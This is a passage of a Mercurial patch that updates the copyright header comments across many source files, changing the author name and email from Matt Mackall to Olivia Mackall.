<olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/common.py b/mercurial/hgweb/common.py --- a/mercurial/hgweb/common.py +++ b/mercurial/hgweb/common.py @@ -1,7 +1,7 @@ # hgweb/common.py - Utility functions needed by hgweb_mod and hgwebdir_mod # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/hgweb_mod.py b/mercurial/hgweb/hgweb_mod.py --- a/mercurial/hgweb/hgweb_mod.py +++ b/mercurial/hgweb/hgweb_mod.py @@ -1,7 +1,7 @@ # hgweb/hgweb_mod.py - Web interface for a repository. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/hgwebdir_mod.py b/mercurial/hgweb/hgwebdir_mod.py --- a/mercurial/hgweb/hgwebdir_mod.py +++ b/mercurial/hgweb/hgwebdir_mod.py @@ -1,7 +1,7 @@ # hgweb/hgwebdir_mod.py - Web interface for a directory of repositories. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/request.py b/mercurial/hgweb/request.py --- a/mercurial/hgweb/request.py +++ b/mercurial/hgweb/request.py @@ -1,7 +1,7 @@ # hgweb/request.py - An http request from either CGI or the standalone server. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/server.py b/mercurial/hgweb/server.py --- a/mercurial/hgweb/server.py +++ b/mercurial/hgweb/server.py @@ -1,7 +1,7 @@ # hgweb/server.py - The standalone hg web server. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/webcommands.py b/mercurial/hgweb/webcommands.py --- a/mercurial/hgweb/webcommands.py +++ b/mercurial/hgweb/webcommands.py @@ -1,6 +1,6 @@ # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/webutil.py b/mercurial/hgweb/webutil.py --- a/mercurial/hgweb/webutil.py +++ b/mercurial/hgweb/webutil.py @@ -1,7 +1,7 @@ # hgweb/webutil.py - utility library for the web interface. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hook.py b/mercurial/hook.py --- a/mercurial/hook.py +++ b/mercurial/hook.py @@ -1,6 +1,6 @@ # hook.py - hook support for mercurial # -# Copyright 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/httpconnection.py b/mercurial/httpconnection.py --- a/mercurial/httpconnection.py +++ b/mercurial/httpconnection.py @@ -1,6 +1,6 @@ # httpconnection.py - urllib2 handler for new http support # -# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com> # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # Copyright 2011 Google, Inc. diff --git a/mercurial/httppeer.py b/mercurial/httppeer.py --- a/mercurial/httppeer.py +++ b/mercurial/httppeer.py @@ -1,6 +1,6 @@ # httppeer.py - HTTP repository proxy classes for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/i18n.py b/mercurial/i18n.py --- a/mercurial/i18n.py +++ b/mercurial/i18n.py @@ -1,6 +1,6 @@ # i18n.py - internationalization support for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -1,6 +1,6 @@ # localrepo.py - read/write repository class for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/lock.py b/mercurial/lock.py --- a/mercurial/lock.py +++ b/mercurial/lock.py @@ -1,6 +1,6 @@ # lock.py - simple advisory locking scheme for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/logcmdutil.py b/mercurial/logcmdutil.py --- a/mercurial/logcmdutil.py +++ b/mercurial/logcmdutil.py @@ -1,6 +1,6 @@ # logcmdutil.py - utility for log-like commands # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/mail.py b/mercurial/mail.py --- a/mercurial/mail.py +++ b/mercurial/mail.py @@ -1,6 +1,6 @@ # mail.py - mail sending bits for mercurial # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/manifest.py b/mercurial/manifest.py --- a/mercurial/manifest.py +++ b/mercurial/manifest.py @@ -1,6 +1,6 @@ # manifest.py - manifest revision class for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/match.py b/mercurial/match.py --- a/mercurial/match.py +++ b/mercurial/match.py @@ -1,6 +1,6 @@ # match.py - filename matching # -# Copyright 2008, 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2008, 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/mdiff.py b/mercurial/mdiff.py --- a/mercurial/mdiff.py +++ b/mercurial/mdiff.py @@ -1,6 +1,6 @@ # mdiff.py - diff and patch routines for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/merge.py b/mercurial/merge.py --- a/mercurial/merge.py +++ b/mercurial/merge.py @@ -1,6 +1,6 @@ # merge.py - directory-level update/merge handling for Mercurial # -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/mergeutil.py b/mercurial/mergeutil.py --- a/mercurial/mergeutil.py +++ b/mercurial/mergeutil.py @@ -1,6 +1,6 @@ # mergeutil.py - help for merge processing in mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/minirst.py b/mercurial/minirst.py --- a/mercurial/minirst.py +++ b/mercurial/minirst.py @@ -1,6 +1,6 @@ # minirst.py - minimal reStructuredText parser # -# Copyright 2009, 2010 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009, 2010 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/mpatch.c b/mercurial/mpatch.c --- a/mercurial/mpatch.c +++ b/mercurial/mpatch.c @@ -14,7 +14,7 @@ allocation of intermediate Python objects. Working memory is about 2x the total number of hunks. - Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> + Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/node.py b/mercurial/node.py --- a/mercurial/node.py +++ b/mercurial/node.py @@ -1,6 +1,6 @@ # node.py - basic nodeid manipulation for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/parser.py b/mercurial/parser.py --- a/mercurial/parser.py +++ b/mercurial/parser.py @@ -1,6 +1,6 @@ # parser.py - simple top-down operator precedence parser for mercurial # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/posix.py b/mercurial/posix.py --- a/mercurial/posix.py +++ b/mercurial/posix.py @@ -1,6 +1,6 @@ # posix.py - Posix utility function implementations for Mercurial # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pure/bdiff.py b/mercurial/pure/bdiff.py --- a/mercurial/pure/bdiff.py +++ b/mercurial/pure/bdiff.py @@ -1,6 +1,6 @@ # bdiff.py - Python implementation of bdiff.c # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pure/charencode.py b/mercurial/pure/charencode.py --- a/mercurial/pure/charencode.py +++ b/mercurial/pure/charencode.py @@ -1,6 +1,6 @@ # charencode.py - miscellaneous character encoding # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pure/mpatch.py b/mercurial/pure/mpatch.py --- a/mercurial/pure/mpatch.py +++ b/mercurial/pure/mpatch.py @@ -1,6 +1,6 @@ # mpatch.py - Python implementation of mpatch.c # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pure/osutil.py b/mercurial/pure/osutil.py --- a/mercurial/pure/osutil.py +++ b/mercurial/pure/osutil.py @@ -1,6 +1,6 @@ # osutil.py - pure Python version of osutil.c # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -1,6 +1,6 @@ # parsers.py - Python implementation of parsers.c # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pushkey.py b/mercurial/pushkey.py --- a/mercurial/pushkey.py +++ b/mercurial/pushkey.py @@ -1,6 +1,6 @@ # pushkey.py - dispatching for pushing and pulling keys # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pvec.py b/mercurial/pvec.py --- a/mercurial/pvec.py +++ b/mercurial/pvec.py @@ -1,6 +1,6 @@ # pvec.py - probabilistic vector clocks for Mercurial # -# Copyright 2012 Matt Mackall <mpm@selenic.com> +# Copyright 2012 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/repair.py b/mercurial/repair.py --- a/mercurial/repair.py +++ b/mercurial/repair.py @@ -1,7 +1,7 @@ # repair.py - functions for repository repair for mercurial # # Copyright 2005, 2006 Chris Mason <mason@suse.com> -# Copyright 2007 Matt Mackall +# Copyright 2007 Olivia Mackall # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -1,6 +1,6 @@ # requirements.py - objects and functions related to repository requirements # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -1,6 +1,6 @@ # revlog.py - storage back-end for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/revlogutils/constants.py b/mercurial/revlogutils/constants.py --- a/mercurial/revlogutils/constants.py +++ b/mercurial/revlogutils/constants.py @@ -1,6 +1,6 @@ # revlogdeltas.py - constant used for revlog logic # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2018 Octobus <contact@octobus.net> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/revlogutils/deltas.py b/mercurial/revlogutils/deltas.py --- a/mercurial/revlogutils/deltas.py +++ b/mercurial/revlogutils/deltas.py @@ -1,6 +1,6 @@ # revlogdeltas.py - Logic around delta computation for revlog # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2018 Octobus <contact@octobus.net> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -1,6 +1,6 @@ # revset.py - revision set queries for mercurial # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/revsetlang.py b/mercurial/revsetlang.py --- a/mercurial/revsetlang.py +++ b/mercurial/revsetlang.py @@ -1,6 +1,6 @@ # revsetlang.py - parser, tokenizer and utility for revision set language # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/scmutil.py b/mercurial/scmutil.py --- a/mercurial/scmutil.py +++ b/mercurial/scmutil.py @@ -1,6 +1,6 @@ # scmutil.py - Mercurial core utility functions # -# Copyright Matt Mackall <mpm@selenic.com> +# Copyright Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/server.py b/mercurial/server.py --- a/mercurial/server.py +++ b/mercurial/server.py @@ -1,6 +1,6 @@ # server.py - utility and factory of server # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/similar.py b/mercurial/similar.py --- a/mercurial/similar.py +++ b/mercurial/similar.py @@ -1,6 +1,6 @@ # similar.py - mechanisms for finding similar files # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/smartset.py b/mercurial/smartset.py --- a/mercurial/smartset.py +++ b/mercurial/smartset.py @@ -1,6 +1,6 @@ # smartset.py - data structure for revision set # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -1,6 +1,6 @@ # sshpeer.py - ssh repository proxy class for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/sslutil.py b/mercurial/sslutil.py --- a/mercurial/sslutil.py +++ b/mercurial/sslutil.py @@ -1,6 +1,6 @@ # sslutil.py - SSL handling for mercurial # -# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com> # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # diff --git a/mercurial/stack.py b/mercurial/stack.py --- a/mercurial/stack.py +++ b/mercurial/stack.py @@ -1,6 +1,6 @@ # stack.py - Mercurial functions for stack definition # -# Copyright Matt Mackall <mpm@selenic.com> and other +# Copyright Olivia Mackall <olivia@selenic.com> and other # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/statichttprepo.py b/mercurial/statichttprepo.py --- a/mercurial/statichttprepo.py +++ b/mercurial/statichttprepo.py @@ -2,7 +2,7 @@ # # This provides read-only repo access to repositories exported via static http # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -1,6 +1,6 @@ # store.py - repository store handling for Mercurial # -# Copyright 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/subrepo.py b/mercurial/subrepo.py --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -1,6 +1,6 @@ # subrepo.py - sub-repository classes and factory # -# Copyright 2009-2010 Matt Mackall <mpm@selenic.com> +# Copyright 2009-2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/subrepoutil.py b/mercurial/subrepoutil.py --- a/mercurial/subrepoutil.py +++ b/mercurial/subrepoutil.py @@ -1,6 +1,6 @@ # subrepoutil.py - sub-repository operations and substate handling # -# Copyright 2009-2010 Matt Mackall <mpm@selenic.com> +# Copyright 2009-2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/tags.py b/mercurial/tags.py --- a/mercurial/tags.py +++ b/mercurial/tags.py @@ -1,6 +1,6 @@ # tags.py - read tag info from local repository # -# Copyright 2009 Matt Mackall <mpm@selenic.com> +# Copyright 2009 Olivia Mackall <olivia@selenic.com> # Copyright 2009 Greg Ward <greg@gerg.ca> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/templatefilters.py b/mercurial/templatefilters.py --- a/mercurial/templatefilters.py +++ b/mercurial/templatefilters.py @@ -1,6 +1,6 @@ # templatefilters.py - common template expansion filters # -# Copyright 2005-2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/templatefuncs.py b/mercurial/templatefuncs.py --- a/mercurial/templatefuncs.py +++ b/mercurial/templatefuncs.py @@ -1,6 +1,6 @@ # templatefuncs.py - common template functions # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/templatekw.py b/mercurial/templatekw.py --- a/mercurial/templatekw.py +++ b/mercurial/templatekw.py @@ -1,6 +1,6 @@ # templatekw.py - common changeset template keywords # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/templater.py b/mercurial/templater.py --- a/mercurial/templater.py +++ b/mercurial/templater.py @@ -1,6 +1,6 @@ # templater.py - template expansion for output # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/templateutil.py b/mercurial/templateutil.py --- a/mercurial/templateutil.py +++ b/mercurial/templateutil.py @@ -1,6 +1,6 @@ # templateutil.py - utility for template evaluation # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/transaction.py b/mercurial/transaction.py --- a/mercurial/transaction.py +++ b/mercurial/transaction.py @@ -6,7 +6,7 @@ # effectively log-structured, this should amount to simply truncating # anything that isn't referenced in the changelog. # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/treediscovery.py b/mercurial/treediscovery.py --- a/mercurial/treediscovery.py +++ b/mercurial/treediscovery.py @@ -1,6 +1,6 @@ # discovery.py - protocol changeset discovery functions # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -1,6 +1,6 @@ # ui.py - user interface bits for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/url.py b/mercurial/url.py --- a/mercurial/url.py +++ b/mercurial/url.py @@ -1,6 +1,6 @@ # url.py - HTTP handling for mercurial # -# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com> # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -1,7 +1,7 @@ # util.py - Mercurial utility functions and platform specific implementations # # Copyright 2005 K. Thananchayan <thananck@yahoo.com> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/utils/procutil.py b/mercurial/utils/procutil.py --- a/mercurial/utils/procutil.py +++ b/mercurial/utils/procutil.py @@ -1,7 +1,7 @@ # procutil.py - utility for managing processes and executable environment # # Copyright 2005 K. Thananchayan <thananck@yahoo.com> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/utils/resourceutil.py b/mercurial/utils/resourceutil.py --- a/mercurial/utils/resourceutil.py +++ b/mercurial/utils/resourceutil.py @@ -1,7 +1,7 @@ # resourceutil.py - utility for looking up resources # # Copyright 2005 K. Thananchayan <thananck@yahoo.com> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/utils/stringutil.py b/mercurial/utils/stringutil.py --- a/mercurial/utils/stringutil.py +++ b/mercurial/utils/stringutil.py @@ -1,7 +1,7 @@ # stringutil.py - utility for generic string formatting, parsing, etc. # # Copyright 2005 K. Thananchayan <thananck@yahoo.com> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/verify.py b/mercurial/verify.py --- a/mercurial/verify.py +++ b/mercurial/verify.py @@ -1,6 +1,6 @@ # verify.py - repository integrity checking for Mercurial # -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/vfs.py b/mercurial/vfs.py --- a/mercurial/vfs.py +++ b/mercurial/vfs.py @@ -1,6 +1,6 @@ # vfs.py - Mercurial 'vfs' classes # -# Copyright Matt Mackall <mpm@selenic.com> +# Copyright Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/win32.py b/mercurial/win32.py --- a/mercurial/win32.py +++ b/mercurial/win32.py @@ -1,6 +1,6 @@ # win32.py - utility functions that use win32 API # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/windows.py b/mercurial/windows.py --- a/mercurial/windows.py +++ b/mercurial/windows.py @@ -1,6 +1,6 @@ # windows.py - Windows utility function implementations for Mercurial # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/wireprotoserver.py b/mercurial/wireprotoserver.py --- a/mercurial/wireprotoserver.py +++ b/mercurial/wireprotoserver.py @@ -1,5 +1,5 @@ # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/wireprotov1peer.py b/mercurial/wireprotov1peer.py --- a/mercurial/wireprotov1peer.py +++ b/mercurial/wireprotov1peer.py @@ -1,6 +1,6 @@ # wireprotov1peer.py - Client-side functionality for wire protocol version 1. # -# Copyright 2005-2010 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/wireprotov1server.py b/mercurial/wireprotov1server.py --- a/mercurial/wireprotov1server.py +++ b/mercurial/wireprotov1server.py @@ -1,6 +1,6 @@ # wireprotov1server.py - Wire protocol version 1 server functionality # -# Copyright 2005-2010 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/wireprotov2server.py b/mercurial/wireprotov2server.py --- a/mercurial/wireprotov2server.py +++ b/mercurial/wireprotov2server.py @@ -1,5 +1,5 @@ # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/worker.py b/mercurial/worker.py --- a/mercurial/worker.py +++ b/mercurial/worker.py @@ -442,7 +442,7 @@ we ever write workers that need to preserve grouping in input we should consider allowing callers to specify a partition strategy. - 